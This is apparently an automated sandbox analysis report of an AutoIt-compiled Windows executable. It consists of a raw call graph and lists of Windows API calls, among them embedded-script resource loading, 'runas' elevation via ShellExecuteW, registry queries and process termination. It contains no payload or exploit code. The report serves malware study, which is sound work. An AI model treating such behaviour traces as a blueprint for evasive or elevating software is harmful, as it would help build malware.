98178 1663b2 98160->98178 98181 166369 98160->98181 98216 11ec40 98160->98216 98496 18359c 82 API calls __wsopen_s 98162->98496 98164 1663d1 98498 195745 54 API calls _wcslen 98164->98498 98165 12153c 98167 121940 9 API calls 98165->98167 98168 121549 98167->98168 98172 1664fa 98168->98172 98174 121940 9 API calls 98168->98174 98169->98160 98170 121872 98493 12faeb 23 API calls 98170->98493 98171->98160 98172->98181 98499 18359c 82 API calls __wsopen_s 98172->98499 98179 121563 98174->98179 98177->98164 98177->98165 98497 18359c 82 API calls __wsopen_s 98178->98497 98179->98172 98182 11a8c7 22 API calls 98179->98182 98184 1215c7 ISource 98179->98184 98181->98134 98182->98184 98183 121940 9 API calls 98183->98184 98184->98170 98184->98172 98184->98181 98184->98183 98187 12167b ISource 98184->98187 98193 114f39 68 API calls 98184->98193 98240 19959f 98184->98240 98243 18f0ec 98184->98243 98252 12effa 98184->98252 98309 17d4ce 98184->98309 98312 19958b 98184->98312 98315 186ef1 98184->98315 98395 19e204 98184->98395 98431 18744a 98184->98431 98185 12171d 98185->98134 98187->98185 98488 12ce17 22 API calls ISource 98187->98488 98193->98184 98197->98134 98198->98134 98199->98106 98200->98111 98201->98129 98202->98129 98203->98129 98204->98133 98205->98129 98207 121981 98206->98207 98213 12195d 98206->98213 98500 130242 5 API calls __Init_thread_wait 98207->98500 98209 12198b 98209->98213 98501 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98209->98501 98211 128727 98215 1213a0 98211->98215 98503 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98211->98503 98213->98215 98502 130242 5 API calls __Init_thread_wait 98213->98502 98215->98149 98234 11ec76 ISource 98216->98234 98217 12fddb 22 API calls 98217->98234 98218 11fef7 98224 11a8c7 22 API calls 98218->98224 98232 11ed9d ISource 98218->98232 98221 164600 98227 11a8c7 22 API calls 98221->98227 98221->98232 98222 164b0b 98507 18359c 82 API calls __wsopen_s 98222->98507 
98224->98232 98226 11a8c7 22 API calls 98226->98234 98227->98232 98229 130242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98229->98234 98230 11fbe3 98230->98232 98233 164bdc 98230->98233 98239 11f3ae ISource 98230->98239 98231 11a961 22 API calls 98231->98234 98232->98160 98508 18359c 82 API calls __wsopen_s 98233->98508 98234->98217 98234->98218 98234->98221 98234->98222 98234->98226 98234->98229 98234->98230 98234->98231 98234->98232 98235 1300a3 29 API calls pre_c_initialization 98234->98235 98237 164beb 98234->98237 98238 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98234->98238 98234->98239 98504 1201e0 256 API calls 2 library calls 98234->98504 98505 1206a0 41 API calls ISource 98234->98505 98235->98234 98509 18359c 82 API calls __wsopen_s 98237->98509 98238->98234 98239->98232 98506 18359c 82 API calls __wsopen_s 98239->98506 98510 197f59 98240->98510 98242 1995af 98242->98184 98244 117510 53 API calls 98243->98244 98245 18f126 98244->98245 98643 119e90 98245->98643 98247 18f136 98248 18f15b 98247->98248 98249 11ec40 256 API calls 98247->98249 98251 18f15f 98248->98251 98671 119c6e 98248->98671 98249->98248 98251->98184 98253 119c6e 22 API calls 98252->98253 98254 12f012 98253->98254 98256 12fddb 22 API calls 98254->98256 98259 16f0a8 98254->98259 98257 12f02b 98256->98257 98258 12fe0b 22 API calls 98257->98258 98261 12f03c 98258->98261 98260 12f0a4 98259->98260 98761 189caa 39 API calls 98259->98761 98268 12f0b1 98260->98268 98724 11b567 98260->98724 98729 116246 98261->98729 98265 11a961 22 API calls 98267 12f04f 98265->98267 98266 16f10a 98266->98268 98269 16f112 98266->98269 98270 116246 CloseHandle 98267->98270 98705 12fa5b 98268->98705 98272 11b567 39 API calls 98269->98272 98273 12f056 98270->98273 98277 12f0b8 98272->98277 98274 117510 53 API calls 98273->98274 98275 12f062 98274->98275 98276 116246 CloseHandle 98275->98276 98278 12f06c 
98276->98278 98279 16f127 98277->98279 98280 12f0d3 98277->98280 98733 115745 98278->98733 98283 12fe0b 22 API calls 98279->98283 98282 116270 22 API calls 98280->98282 98286 12f0db 98282->98286 98284 16f12c 98283->98284 98288 16f140 98284->98288 98762 12f866 ReadFile SetFilePointerEx 98284->98762 98710 12f141 98286->98710 98299 16f144 __fread_nolock 98288->98299 98763 180e85 22 API calls ___scrt_fastfail 98288->98763 98289 16f0a0 98760 116216 CloseHandle ISource 98289->98760 98290 12f085 98741 1153de 98290->98741 98291 12f0ea 98291->98299 98757 1162b5 22 API calls 98291->98757 98297 12f093 98756 1153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98297->98756 98300 12f09a 98300->98260 98301 16f069 98300->98301 98759 17ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98301->98759 98302 12f0fe 98303 12f138 98302->98303 98304 116246 CloseHandle 98302->98304 98303->98184 98306 12f12c 98304->98306 98306->98303 98758 116216 CloseHandle ISource 98306->98758 98307 16f080 98307->98260 98808 17dbbe lstrlenW 98309->98808 98313 197f59 120 API calls 98312->98313 98314 19959b 98313->98314 98314->98184 98316 11a961 22 API calls 98315->98316 98317 186f1d 98316->98317 98318 11a961 22 API calls 98317->98318 98319 186f26 98318->98319 98320 186f3a 98319->98320 98321 11b567 39 API calls 98319->98321 98322 117510 53 API calls 98320->98322 98321->98320 98327 186f57 _wcslen 98322->98327 98323 186fbc 98325 117510 53 API calls 98323->98325 98324 1870bf 98326 114ecb 94 API calls 98324->98326 98328 186fc8 98325->98328 98329 1870d0 98326->98329 98327->98323 98327->98324 98394 1870e9 98327->98394 98333 11a8c7 22 API calls 98328->98333 98336 186fdb 98328->98336 98330 1870e5 98329->98330 98331 114ecb 94 API calls 98329->98331 98332 11a961 22 API calls 98330->98332 98330->98394 98331->98330 98334 18711a 98332->98334 98333->98336 98335 11a961 22 API calls 98334->98335 98340 187126 98335->98340 98337 187027 98336->98337 98338 187005 98336->98338 98341 11a8c7 22 API calls 
98336->98341 98339 117510 53 API calls 98337->98339 98342 1133c6 22 API calls 98338->98342 98343 187034 98339->98343 98344 11a961 22 API calls 98340->98344 98341->98338 98345 18700f 98342->98345 98346 18703d 98343->98346 98347 187047 98343->98347 98348 18712f 98344->98348 98349 117510 53 API calls 98345->98349 98350 11a8c7 22 API calls 98346->98350 98973 17e199 GetFileAttributesW 98347->98973 98352 11a961 22 API calls 98348->98352 98354 18701b 98349->98354 98350->98347 98353 187138 98352->98353 98357 117510 53 API calls 98353->98357 98358 116350 22 API calls 98354->98358 98355 187050 98356 187063 98355->98356 98359 114c6d 22 API calls 98355->98359 98361 117510 53 API calls 98356->98361 98367 187069 98356->98367 98360 187145 98357->98360 98358->98337 98359->98356 98813 11525f 98360->98813 98363 1870a0 98361->98363 98974 17d076 57 API calls 98363->98974 98364 187166 98366 114c6d 22 API calls 98364->98366 98368 187175 98366->98368 98367->98394 98369 1871a9 98368->98369 98370 114c6d 22 API calls 98368->98370 98371 11a8c7 22 API calls 98369->98371 98373 187186 98370->98373 98372 1871ba 98371->98372 98855 116350 98372->98855 98373->98369 98376 116b57 22 API calls 98373->98376 98378 18719b 98376->98378 98377 116350 22 API calls 98379 1871d6 98377->98379 98380 116b57 22 API calls 98378->98380 98381 116350 22 API calls 98379->98381 98380->98369 98382 1871e4 98381->98382 98383 117510 53 API calls 98382->98383 98384 1871f0 98383->98384 98864 17d7bc 98384->98864 98386 187201 98387 17d4ce 4 API calls 98386->98387 98388 18720b 98387->98388 98389 117510 53 API calls 98388->98389 98392 187239 98388->98392 98390 187229 98389->98390 98918 182947 98390->98918 98393 114f39 68 API calls 98392->98393 98393->98394 98394->98184 98396 11a961 22 API calls 98395->98396 98397 19e21b 98396->98397 98398 117510 53 API calls 98397->98398 98399 19e22a 98398->98399 98400 116270 22 API calls 98399->98400 98401 19e23d 98400->98401 98402 117510 53 API calls 98401->98402 98403 19e24a 98402->98403 98404 
19e262 98403->98404 98405 19e2c7 98403->98405 98407 11b567 39 API calls 98404->98407 98406 117510 53 API calls 98405->98406 98408 19e2cc 98406->98408 98409 19e267 98407->98409 98410 19e2d9 98408->98410 98411 19e314 98408->98411 98409->98410 98413 19e280 98409->98413 98412 119c6e 22 API calls 98410->98412 98414 19e32c 98411->98414 98416 11b567 39 API calls 98411->98416 98428 19e2e6 98412->98428 98415 116d25 22 API calls 98413->98415 98417 19e345 98414->98417 98420 11b567 39 API calls 98414->98420 98419 19e28d 98415->98419 98416->98414 98418 11a8c7 22 API calls 98417->98418 98421 19e35f 98418->98421 98422 116350 22 API calls 98419->98422 98420->98417 99014 1792c8 98421->99014 98424 19e29b 98422->98424 98425 116d25 22 API calls 98424->98425 98426 19e2b4 98425->98426 98427 116350 22 API calls 98426->98427 98430 19e2c2 98427->98430 98428->98184 99033 1162b5 22 API calls 98430->99033 98432 187469 98431->98432 98433 187474 98431->98433 98434 11b567 39 API calls 98432->98434 98436 11a961 22 API calls 98433->98436 98474 187554 98433->98474 98434->98433 98435 12fddb 22 API calls 98437 187587 98435->98437 98439 187495 98436->98439 98438 12fe0b 22 API calls 98437->98438 98440 187598 98438->98440 98441 11a961 22 API calls 98439->98441 98442 116246 CloseHandle 98440->98442 98443 18749e 98441->98443 98444 1875a3 98442->98444 98445 117510 53 API calls 98443->98445 98446 11a961 22 API calls 98444->98446 98447 1874aa 98445->98447 98449 1875ab 98446->98449 98448 11525f 22 API calls 98447->98448 98450 1874bf 98448->98450 98451 116246 CloseHandle 98449->98451 98452 116350 22 API calls 98450->98452 98453 1875b2 98451->98453 98454 1874f2 98452->98454 98455 117510 53 API calls 98453->98455 98456 18754a 98454->98456 98458 17d4ce 4 API calls 98454->98458 98457 1875be 98455->98457 98460 11b567 39 API calls 98456->98460 98459 116246 CloseHandle 98457->98459 98461 187502 98458->98461 98463 1875c8 98459->98463 98460->98474 98461->98456 98462 187506 98461->98462 98464 119cb3 22 API calls 
98462->98464 98465 115745 5 API calls 98463->98465 98466 187513 98464->98466 98467 1875e2 98465->98467 99034 17d2c1 26 API calls 98466->99034 98468 1875ea 98467->98468 98469 1876de GetLastError 98467->98469 98472 1153de 27 API calls 98468->98472 98471 1876f7 98469->98471 99038 116216 CloseHandle ISource 98471->99038 98475 1875f8 98472->98475 98474->98435 98486 1876a4 98474->98486 99035 1153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98475->99035 98476 18751c 98476->98456 98478 187645 98479 12fddb 22 API calls 98478->98479 98482 187679 98479->98482 98480 187619 99036 17ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98480->99036 98481 1875ff 98481->98478 98481->98480 98484 11a961 22 API calls 98482->98484 98485 187686 98484->98485 98485->98486 99037 17417d 22 API calls __fread_nolock 98485->99037 98486->98184 98488->98187 98489->98145 98490->98148 98491->98158 98492->98170 98493->98170 98494->98147 98495->98181 98496->98181 98497->98181 98498->98179 98499->98181 98500->98209 98501->98213 98502->98211 98503->98215 98504->98234 98505->98234 98506->98232 98507->98232 98508->98237 98509->98232 98548 117510 98510->98548 98514 198281 98515 19844f 98514->98515 98520 19828f 98514->98520 98612 198ee4 60 API calls 98515->98612 98518 19845e 98519 19846a 98518->98519 98518->98520 98534 197fd5 ISource 98519->98534 98584 197e86 98520->98584 98521 117510 53 API calls 98536 198049 98521->98536 98526 1982c8 98599 12fc70 98526->98599 98529 1982e8 98605 18359c 82 API calls __wsopen_s 98529->98605 98530 198302 98606 1163eb 22 API calls 98530->98606 98533 1982f3 GetCurrentProcess TerminateProcess 98533->98530 98534->98242 98535 198311 98607 116a50 22 API calls 98535->98607 98536->98514 98536->98521 98536->98534 98603 17417d 22 API calls __fread_nolock 98536->98603 98604 19851d 42 API calls _strftime 98536->98604 98538 19832a 98547 198352 98538->98547 98608 1204f0 22 API calls 98538->98608 98540 1984c5 98540->98534 98544 1984d9 FreeLibrary 98540->98544 98541 
198341 98609 198b7b 75 API calls 98541->98609 98544->98534 98547->98540 98610 1204f0 22 API calls 98547->98610 98611 11aceb 23 API calls ISource 98547->98611 98613 198b7b 75 API calls 98547->98613 98549 117525 98548->98549 98565 117522 98548->98565 98550 11755b 98549->98550 98551 11752d 98549->98551 98553 1550f6 98550->98553 98556 11756d 98550->98556 98561 15500f 98550->98561 98614 1351c6 26 API calls 98551->98614 98617 135183 26 API calls 98553->98617 98554 11753d 98560 12fddb 22 API calls 98554->98560 98615 12fb21 51 API calls 98556->98615 98557 15510e 98557->98557 98562 117547 98560->98562 98564 12fe0b 22 API calls 98561->98564 98570 155088 98561->98570 98563 119cb3 22 API calls 98562->98563 98563->98565 98566 155058 98564->98566 98565->98534 98571 198cd3 98565->98571 98567 12fddb 22 API calls 98566->98567 98568 15507f 98567->98568 98569 119cb3 22 API calls 98568->98569 98569->98570 98616 12fb21 51 API calls 98570->98616 98572 11aec9 22 API calls 98571->98572 98573 198cee CharLowerBuffW 98572->98573 98618 178e54 98573->98618 98577 11a961 22 API calls 98578 198d2a 98577->98578 98625 116d25 98578->98625 98580 198d3e 98581 1193b2 22 API calls 98580->98581 98583 198d48 _wcslen 98581->98583 98582 198e5e _wcslen 98582->98536 98583->98582 98638 19851d 42 API calls _strftime 98583->98638 98585 197ea1 98584->98585 98589 197eec 98584->98589 98586 12fe0b 22 API calls 98585->98586 98587 197ec3 98586->98587 98588 12fddb 22 API calls 98587->98588 98587->98589 98588->98587 98590 199096 98589->98590 98591 1992ab ISource 98590->98591 98598 1990ba _strcat _wcslen 98590->98598 98591->98526 98592 11b6b5 39 API calls 98592->98598 98593 11b567 39 API calls 98593->98598 98594 11b38f 39 API calls 98594->98598 98595 13ea0c 21 API calls ___std_exception_copy 98595->98598 98596 117510 53 API calls 98596->98598 98598->98591 98598->98592 98598->98593 98598->98594 98598->98595 98598->98596 98642 17efae 24 API calls _wcslen 98598->98642 98600 12fc85 98599->98600 98601 12fd1d VirtualAlloc 

                Control-flow Graph

                APIs
                • GetVersionExW.KERNEL32(?), ref: 0011430D
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • GetCurrentProcess.KERNEL32(?,001ACB64,00000000,?,?), ref: 00114422
                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00114429
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00114454
                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00114466
                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00114474
                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0011447B
                • GetSystemInfo.KERNEL32(?,?,?), ref: 001144A0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                • API String ID: 3290436268-3101561225
                • Opcode ID: 748f170faf2c8b2e4f9fac8dbbc1c7ec9c3464d1d24a6bec13762d39d4240557
                • Instruction ID: 67385446f9f89ebad980138ab2f914aa52b08c8505828cb999e875150228a19a
                • Opcode Fuzzy Hash: 748f170faf2c8b2e4f9fac8dbbc1c7ec9c3464d1d24a6bec13762d39d4240557
                • Instruction Fuzzy Hash: 43A1927690A2C0EFC719C7EA78C15DD7FA47B26B61B1848A9D4519FE22D3304AC8CB71
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001150AA,?,?,00000000,00000000), ref: 001142B2
                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001150AA,?,?,00000000,00000000), ref: 001142C9
                • LoadResource.KERNEL32(?,00000000,?,?,001150AA,?,?,00000000,00000000,?,?,?,?,?,?,00114F20), ref: 001535BE
                • SizeofResource.KERNEL32(?,00000000,?,?,001150AA,?,?,00000000,00000000,?,?,?,?,?,?,00114F20), ref: 001535D3
                • LockResource.KERNEL32(001150AA,?,?,001150AA,?,?,00000000,00000000,?,?,?,?,?,?,00114F20,?), ref: 001535E6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                • String ID: SCRIPT
                • API String ID: 3051347437-3967369404
                • Opcode ID: 35446feb399535b0c235ad2f973350ef9696f18b09a39c4b788b009944339cd9
                • Instruction ID: 24b94e386d054d8b553e0432767dfa9fe33659e3309c4b9aa0586b2217521a96
                • Opcode Fuzzy Hash: 35446feb399535b0c235ad2f973350ef9696f18b09a39c4b788b009944339cd9
                • Instruction Fuzzy Hash: A6118E74200700BFD7258B65EC48F6B7BBAEBC6B51F104169F452D6650DB71DC808A70
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00112B6B
                  • Part of subcall function 00113A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001E1418,?,00112E7F,?,?,?,00000000), ref: 00113A78
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • GetForegroundWindow.USER32(runas,?,?,?,?,?,001D2224), ref: 00152C10
                • ShellExecuteW.SHELL32(00000000,?,?,001D2224), ref: 00152C17
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                • String ID: runas
                • API String ID: 448630720-4000483414
                • Opcode ID: 504e2d41ef6337e4cbd96c7441548c5aca642b1dbd2465d0d1e943854a336eb9
                • Instruction ID: 85f863dd578b7a354b6bd61b1a819049d56e83718d45a24fa799cadcaef43d55
                • Opcode Fuzzy Hash: 504e2d41ef6337e4cbd96c7441548c5aca642b1dbd2465d0d1e943854a336eb9
                • Instruction Fuzzy Hash: 0F11D6312083456AC71CFF60E8919FEB7A4AFB6350F44143DF1A2561A2CF319AC9D752
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,00155222), ref: 0017DBCE
                • GetFileAttributesW.KERNELBASE(?), ref: 0017DBDD
                • FindFirstFileW.KERNELBASE(?,?), ref: 0017DBEE
                • FindClose.KERNEL32(00000000), ref: 0017DBFA
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileFind$AttributesCloseFirstlstrlen
                • String ID:
                • API String ID: 2695905019-0
                • Opcode ID: 73daa6d1d4107bd8bd9ac3f6ca5b714391b6803861fff69dc3c196fed47e0404
                • Instruction ID: 8563f46e619ae25d6776cf5b43e6e4d5a115282c8fbe0e4e6a591b6496655551
                • Opcode Fuzzy Hash: 73daa6d1d4107bd8bd9ac3f6ca5b714391b6803861fff69dc3c196fed47e0404
                • Instruction Fuzzy Hash: CDF0A930810918A782216B78AC0D8AA37BD9F03334B10870AF83AC24E0EBB09D9486D6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetInputState.USER32 ref: 0011D807
                • timeGetTime.WINMM ref: 0011DA07
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0011DB28
                • TranslateMessage.USER32(?), ref: 0011DB7B
                • DispatchMessageW.USER32(?), ref: 0011DB89
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0011DB9F
                • Sleep.KERNEL32(0000000A), ref: 0011DBB1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                • String ID:
                • API String ID: 2189390790-0
                • Opcode ID: 3599b8c400433f3fe9a05e7c0b7975ae6cc11672bae0c6917c36823dfabba346
                • Instruction ID: bae8d6837c713a5a6e19fa0e8c3a47b61f70541fdc520bbcaa221d1924beb0ac
                • Opcode Fuzzy Hash: 3599b8c400433f3fe9a05e7c0b7975ae6cc11672bae0c6917c36823dfabba346
                • Instruction Fuzzy Hash: E942F130608741EFD72DCF24E884BAAB7E0BF56314F15852DE4968B691D7B4E8D4CB82
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00112D07
                • RegisterClassExW.USER32(00000030), ref: 00112D31
                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00112D42
                • InitCommonControlsEx.COMCTL32(?), ref: 00112D5F
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00112D6F
                • LoadIconW.USER32(000000A9), ref: 00112D85
                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00112D94
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                • String ID: +$0$@5$AutoIt v3 GUI$TaskbarCreated
                • API String ID: 2914291525-3252143117
                • Opcode ID: fd33a4f057e1a8af2718b703646085b7ca3ab56137726dc5729ff5f285761d1e
                • Instruction ID: bd73ecfc064f162fa8089a07fd1b5809d2fc8f59eeeb39376f4ab3229fdf7ca4
                • Opcode Fuzzy Hash: fd33a4f057e1a8af2718b703646085b7ca3ab56137726dc5729ff5f285761d1e
                • Instruction Fuzzy Hash: 7B21C3B5901258AFDB00DFE4E989BDDBBB4FB09714F00811AF511AA6A0D7B54584CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                  • Part of subcall function 0015039A: CreateFileW.KERNELBASE(00000000,00000000,?,00150704,?,?,00000000,?,00150704,00000000,0000000C), ref: 001503B7
                • GetLastError.KERNEL32 ref: 0015076F
                • __dosmaperr.LIBCMT ref: 00150776
                • GetFileType.KERNELBASE(00000000), ref: 00150782
                • GetLastError.KERNEL32 ref: 0015078C
                • __dosmaperr.LIBCMT ref: 00150795
                • CloseHandle.KERNEL32(00000000), ref: 001507B5
                • CloseHandle.KERNEL32(?), ref: 001508FF
                • GetLastError.KERNEL32 ref: 00150931
                • __dosmaperr.LIBCMT ref: 00150938
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: a8be6f615e05bc767fc3184c7b159935232cbf032b3b15397b8506b70545e0df
                • Instruction ID: abb50ac3971bc6ec2e20a1ac422e43a9dce13e92e63b1f108e496e69e788d332
                • Opcode Fuzzy Hash: a8be6f615e05bc767fc3184c7b159935232cbf032b3b15397b8506b70545e0df
                • Instruction Fuzzy Hash: E1A11732A00144CFDF1AAFA8D891BAE7BA0AB1A325F14015DFC259F391DB319D57CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                  • Part of subcall function 00113A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001E1418,?,00112E7F,?,?,?,00000000), ref: 00113A78
                  • Part of subcall function 00113357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00113379
                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0011356A
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0015318D
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001531CE
                • RegCloseKey.ADVAPI32(?), ref: 00153210
                • _wcslen.LIBCMT ref: 00153277
                • _wcslen.LIBCMT ref: 00153286
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                • API String ID: 98802146-2727554177
                • Opcode ID: 27cb93dca224fd1ed2266dd910aa8d54defa03cc5e7dddc604488bfc95250ae6
                • Instruction ID: 4ec42dd5af27266eff69a189f6251b3dccc6bd164cf8e2c54a62973e76b60ab6
                • Opcode Fuzzy Hash: 27cb93dca224fd1ed2266dd910aa8d54defa03cc5e7dddc604488bfc95250ae6
                • Instruction Fuzzy Hash: E4719E715043449EC318DFA5EC929AFBBE8FF99740F40042EF5559B1A0EB709A89CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00112B8E
                • LoadCursorW.USER32(00000000,00007F00), ref: 00112B9D
                • LoadIconW.USER32(00000063), ref: 00112BB3
